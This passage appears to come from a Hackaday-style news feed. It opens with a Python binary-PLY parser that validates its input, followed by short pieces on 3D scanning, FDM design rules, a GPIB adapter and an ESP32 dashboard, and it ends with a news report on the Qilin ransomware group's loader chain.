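    "char": "b", "int8": "b", "uchar": "B", "uint8": "B",
    "short": "h", "int16": "h", "ushort": "H", "uint16": "H",
    "int": "i", "int32": "i", "uint": "I", "uint32": "I",
    "float": "f", "float32": "f", "double": "d", "float64": "d",
}

Element = Tuple[str, int, List[Tuple[str, str]]]  # (name, count, [(prop, type)])


def parse_header(data: bytes) -> Tuple[List[Element], int]:
    """Parse the ASCII header; return element declarations and the body offset."""
    marker = b"end_header\n"
    end = data.find(marker)
    if end < 0:
        raise ValueError("no end_header line")
    lines = data[:end].decode("ascii").split("\n")
    if lines[0] != "ply":
        raise ValueError("missing 'ply' magic")
    fmt = None
    elements: List[Element] = []
    for line in lines[1:]:
        parts = line.split()
        if not parts or parts[0] in ("comment", "obj_info"):
            continue
        if parts[0] == "format" and len(parts) == 3:
            fmt = parts[1]
        elif parts[0] == "element" and len(parts) == 3:
            elements.append((parts[1], int(parts[2]), []))
        elif parts[0] == "property" and len(parts) == 3 and parts[1] in PLY_TYPES:
            if not elements:
                raise ValueError("property declared before any element")
            elements[-1][2].append((parts[2], parts[1]))
        else:  # list properties and anything unknown are rejected, not guessed at
            raise ValueError(f"unsupported header line: {line!r}")
    if fmt != "binary_little_endian":
        raise ValueError(f"unsupported format {fmt}")
    return elements, end + len(marker)


def read_binary_ply(data: bytes) -> Dict[str, List[Dict[str, float]]]:
    """Decode every element into a list of {property: value} rows."""
    elements, offset = parse_header(data)
    out: Dict[str, List[Dict[str, float]]] = {}
    for name, count, props in elements:
        rec = struct.Struct("<" + "".join(PLY_TYPES[t] for _, t in props))
        needed = rec.size * count
        # The header's count is untrusted: compare it with the bytes that are
        # really there before decoding, so a bogus count cannot drive allocation.
        if count < 0 or offset + needed > len(data):
            raise ValueError(f"element {name}: header claims {count} records, file is truncated")
        names = [p for p, _ in props]
        out[name] = [dict(zip(names, rec.unpack_from(data, offset + i * rec.size)))
                     for i in range(count)]
        offset += needed
    return out


def to_ascii_ply(data: bytes) -> str:
    """Rewrite the binary file as an ASCII PLY, the step the article's script performs."""
    elements, _ = parse_header(data)
    rows = read_binary_ply(data)
    lines = ["ply", "format ascii 1.0"]
    for name, count, props in elements:
        lines.append(f"element {name} {count}")
        lines += [f"property {t} {p}" for p, t in props]
    lines.append("end_header")
    for name, _, _ in elements:
        lines += [" ".join(str(v) for v in row.values()) for row in rows[name]]
    return "\n".join(lines) + "\n"


def is_well_formed(data: bytes) -> bool:
    """True if the file parses completely; malformed or truncated input gives False."""
    try:
        read_binary_ply(data)
        return True
    except (ValueError, struct.error, UnicodeDecodeError):
        return False


def build_sample_ply() -> bytes:
    """Constructed sample (not real Polycam output): three points with colour and opacity."""
    header = (
        "ply\nformat binary_little_endian 1.0\n"
        "comment constructed sample, not from a real scan\n"
        "element vertex 3\n"
        "property float x\nproperty float y\nproperty float z\n"
        "property uchar red\nproperty uchar green\nproperty uchar blue\n"
        "property float opacity\n"
        "end_header\n"
    ).encode("ascii")
    rec = struct.Struct("<fffBBBf")  # 19 bytes per vertex, no padding
    rows = [(0.0, 0.0, 0.0, 255, 0, 0, 1.0),
            (1.0, 0.5, -0.25, 0, 255, 0, 0.5),
            (2.0, 1.0, 0.75, 0, 0, 255, 0.25)]
    return header + b"".join(rec.pack(*r) for r in rows)


if __name__ == "__main__":
    print(to_ascii_ply(build_sample_ply()))
    print("truncated file accepted?", is_well_formed(build_sample_ply()[:-5]))
```

Real splat files carry far more properties per vertex (position, scale, rotation and spherical-harmonic colour coefficients), but they are declared in the header the same way, so the parser above handles them unchanged as long as they are scalar properties.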
We talked about Gaussian splats when the technique was first announced, but it’s obvious the technology has come a long way since then. We did feature a hack with multicolor resin prints last year, but it was much more manual than the fancy machine [Wyatt] uses here. Thanks to [Hari Wiguna] for the tip.
youtube.com/embed/uxgzOpmmEbI?…
Best Practices for FDM Printing
If you’ve been designing parts for 3D printing, you probably have some tricks and standards for your designs. [Rahix] decided to write out a well-thought-out set of design rules for FDM prints, and we can all benefit.
One of the things we liked about the list is that it’s written in a way that explains everything. Every so often, there’s a box with a summarized rule for that topic. At the end, there’s a list of all the rules. The rules are also in categories, including part strength, tolerance, optimization, integration, machine elements, appearance, and vase mode.
For example, section two deals with tolerance and finish. So, rule R2.8 says, “Do not use circular holes for interference fits. Use hexagon or square holes instead.”
We also appreciate that [Rahix] touched on some of the counter-intuitive aspects of designing for FDM printing. For example, you might think adding voids in your part will reduce the filament and time required to print it, but in many cases it can have the opposite effect.
Some of these — maybe even most of these — won’t surprise you, but you still might take away a tidbit or two. But having it all down in a checklist and then the ability to scroll up and find the rationale for the rule is great.
Do you have any rules you’d add? Or change? Let us know. Meanwhile, we were eyeing our favorites about adding machine elements to prints.
“Man and Machine” vs “Man vs Machine”
Every time we end up talking about 3D printers, Al Williams starts off on how bad he is in a machine shop. I’m absolutely sure that he’s exaggerating, but the gist is that he’s much happier to work on stuff in CAD and let the machine take care of the precision and fine physical details. I’m like that too, but with me, it’s the artwork.
I can’t draw to save my life, but once I get it into digital form, I’m pretty good at manipulating images. And then I couldn’t copy that out into the real world, but that’s what the laser cutter is for, right? So the gameplan for this year’s Mother’s Day gift (reminder!) is three-way. I do the physical design, my son does the artwork, we combine them in FreeCAD and then hand it off to the machine. Everyone is playing to their strengths.
So why does it feel a little like cheating to just laser-cut out a present? I’m not honestly sure. My grandfather was a trained architectural draftsman before he let his artistic side run wild and went off to design jewellery. He could draw a nearly perfect circle with nothing more than a pencil, but he also used a French curve set, a pantograph, and a rolling architect’s ruler when they were called for. He had his tools too, and I bet he’d see the equivalence in mine.
People have used tools since the stone age, and the people who master their tools transcend them, and produce work where the “human” shines through despite having traced a curve or having passed the Gcode off to the cutter. If you doubt this, I’ll remind you of the technological feat that is the piano, with which people nonetheless produce music that doesn’t make you think of the hammers or of the tremendous cast metal frame. The tech disappears into the creation.
I’m sure there’s a parable here for our modern use of AI too, but I’ve got a Mother’s Day present to finish.
This article is part of the Hackaday.com newsletter, delivered every seven days for each of the last 200+ weeks. It also includes our favorite articles from the last seven days that you can see on the web version of the newsletter. Want this type of article to hit your inbox every Friday morning? You should sign up!
PoE-powered GPIB Adapter with Ethernet and USB-C Support
In the world of (expensive) lab test equipment the GPIB (general purpose interface bus) connection is hard to avoid if you want any kind of automation, but nobody likes wrangling with the bulky cables and compatibility issues when they can just use Ethernet instead. Here [Chris]’s Ethernet-GPIB adapter provides an easy solution, with both Power over Ethernet (PoE) and USB-C power options. Although commercial adapters already exist, these are rather pricey at ~$500.
Features of this adapter include a BOM total of <$50, with power provided either via PoE (802.3af) or USB-C (5V-only). The MCU is an ATmega4809 with the Ethernet side using a Wiznet W5500 SPI Ethernet controller. There is also a serial interface (provided by a CH340X USB-UART adapter), with the firmware based on the AR488 project.
The adapter supports both the VXI-11.2 and Prologix protocols, though not at the same time (due to ROM size limitations). All design documents are available via the GitHub repository, with the author also selling assembled adapters and providing support primarily via the EEVBlog forums.
Web Dashboard and OTA Updates for the ESP32
Today we are happy to present a web-based GUI for making a web-based GUI! If you’re a programmer then web front-end development might not be your bag. But a web-based graphical user interface (GUI) for administration and reporting for your microcontroller device can look very professional and be super useful. The Mongoose Wizard can help you develop a device dashboard for your ESP32-based project.
In this article (and associated video) the Mongoose developers run you through how to get started with their technology. They help you get your development environment set up, create your dashboard layout, add a dashboard page, add a device settings page, add an over-the-air (OTA) firmware update page, build and test the firmware, and attach the user-interface controls to the hardware. The generated firmware includes an embedded web server for serving your dashboard and delivering its REST interface, pretty handy.
You will find no end of ESP32-based projects here at Hackaday which you could potentially integrate with Mongoose. We think the OTA support is an excellent feature to have, but of course there are other ways of supporting that functionality.
youtube.com/embed/nUwmnySG-FI?…
Thanks to [Toly] for this tip.
Qilin tops the ransomware charts! 72 victims in April 2025 alone!
The Qilin group, which we interviewed some time ago, sits at the top of the list of the most active ransomware operators in April 2025, having published the details of 72 victims on its Data Leak Site (DLS). According to Group-IB this is a record figure: from July 2024 to January 2025 the number of such publications rarely exceeded 23 per month, but from February the curve rose sharply: 48 cases in February, 44 in March and already 45 in the first weeks of April.
The main cause of the increased activity was the sudden disappearance of the rival group RansomHub, which previously ranked second by number of attacks. After its collapse, a significant number of affiliated attackers moved to Qilin, causing exponential growth in its operations. According to Flashpoint, in a single year, from April 2024 to April 2025, RansomHub managed to hit 38 organisations in the financial sector before disappearing from the scene.
What sets the Qilin campaigns apart is the use of a new bundle of malicious components: the already known SmokeLoader module and a new .NET loader, codenamed NETXLOADER.
Trend Micro researchers studied NETXLOADER in detail and noted its key role in malware distribution. This downloader silently installs malicious modules, is protected from analysis by .NET Reactor version 6 and uses several bypass techniques.
NETXLOADER is extremely hard to analyse: the code is encrypted, the method names are uninformative and the execution logic is convoluted. It uses advanced concealment techniques such as JIT hooks and controlled loading of DLLs directly into memory, which defeats static analysis and string searching. In practice, without running it in a real environment it is impossible to understand exactly what this loader does.
The attack chains most often begin with phishing or the compromise of legitimate accounts, after which NETXLOADER enters the infected system. It then triggers SmokeLoader, which performs anti-analysis and virtualisation checks and disables processes from a predefined list. In the final stage, SmokeLoader contacts the remote command-and-control server and receives NETXLOADER from it, which in turn loads the Agenda ransomware using Reflective DLL Loading, loading the library directly into memory without writing it to disk.
Agenda is actively used to attack network domains, external drives, storage and vCenter ESXi hypervisors. Trend Micro observed that the most common victims are healthcare, financial, telecommunications and IT infrastructure organisations in countries such as the United States, India, Brazil, the Philippines and the Netherlands.
With the growing number of victims and the technical maturity of the tools used, Qilin continues to consolidate its position as one of the most technologically advanced ransomware operations in the cybercrime landscape.
The article Qilin tops the ransomware charts! 72 victims in April 2025 alone! comes from il blog della sicurezza informatica.